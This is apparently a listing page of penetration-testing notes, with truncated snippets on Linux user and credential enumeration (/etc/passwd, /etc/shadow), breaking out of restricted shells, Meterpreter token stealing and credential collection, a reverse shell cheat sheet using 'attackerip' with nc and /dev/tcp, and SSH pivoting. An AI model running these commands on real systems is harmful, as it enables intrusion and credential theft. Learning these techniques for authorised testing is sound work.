Latest notes for PenTesting- MrLeet

MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

Users & Groups:
Command Result
cat /etc/passwd List all users on the system
cat /etc/group List all groups on the system
for i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/null List all uid’s and respective group memberships
cat /etc/shadow Show user hashes – Privileged comma...

Score: 1

Table of Contents
Blind Files
User accounts
Determine Distro
Installed Packages
Package Sources
Finding Important Files
Covering Your Tracks
Avoiding history filesmys
Obtain users’ information
Looking for possible opened paths
Maintaining control
Reverse Shell
Fun if ...

Score: 1

Spawning shell/break restricted shell

python -c 'import pty; pty.spawn("/bin/sh")'

/bin/sh -i

echo os.system('/bin/bash')

(From within vi)

Add all binary paths if PATH variable is lacking

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Set up webserver

python -m ...

Score: 1

DNS Enumeration:
Command Result
dig <domain_name> Perform a basic forward lookup
nslookup <domain_name> As above
host <domain_name> As Above
dig @<server> <domain_name> Use a specific name server to perform query
nslookup <domain_name> <server> As above
dig @<server> version.bind chaos tx...

Score: 1

John the Ripper is a favourite password cracking tool of many pentesters. There is plenty of documentation about its command line options.

I’ve encountered the following problems using John the Ripper. These are not problems with the tool itself, but inherent problems with pentesting and password cracking in general.

Sometimes I stumb...

Score: 1

<h2>Information Gathering</h2>
run winenum.rb
run scraper.rb
run checkvm
run credscollect
run get_local_subnets

<h2>Escalating Privs</h2>
ps then migrate

Tokens (use incognito)
list_tokens -u
steal_token ...

Score: 1

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.

If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port...

Score: 1

By: unknowndevice64 2019-05-18 20:31:16

Router Pentesting
Web Applications
Web Sites

Three Different Types of scenario
1. People purchase routers and do not change the interface's credentials
Default Username
Default Passwords


Score: 1

<h1>Reverse Shell Cheat Sheet</h1>
<i>Forked from: Published February 5, 2012 | By phillips321</i>

Step one – Set up your listener.
nc -l -v attackerip 4444

In all these examples the attacker IP will be

exec 5<>/dev/tcp/
cat <&5 | while read line; do $lin...

Score: 0

SSH has several features that are useful during pentesting and auditing. This page aims to remind us of the syntax for the most useful features.

NB: This page does not attempt to replace the man page for pentesters, only to supplement it with some pertinent examples.

Set up a SOCKS proxy on that lets you pivot thr...

Score: 0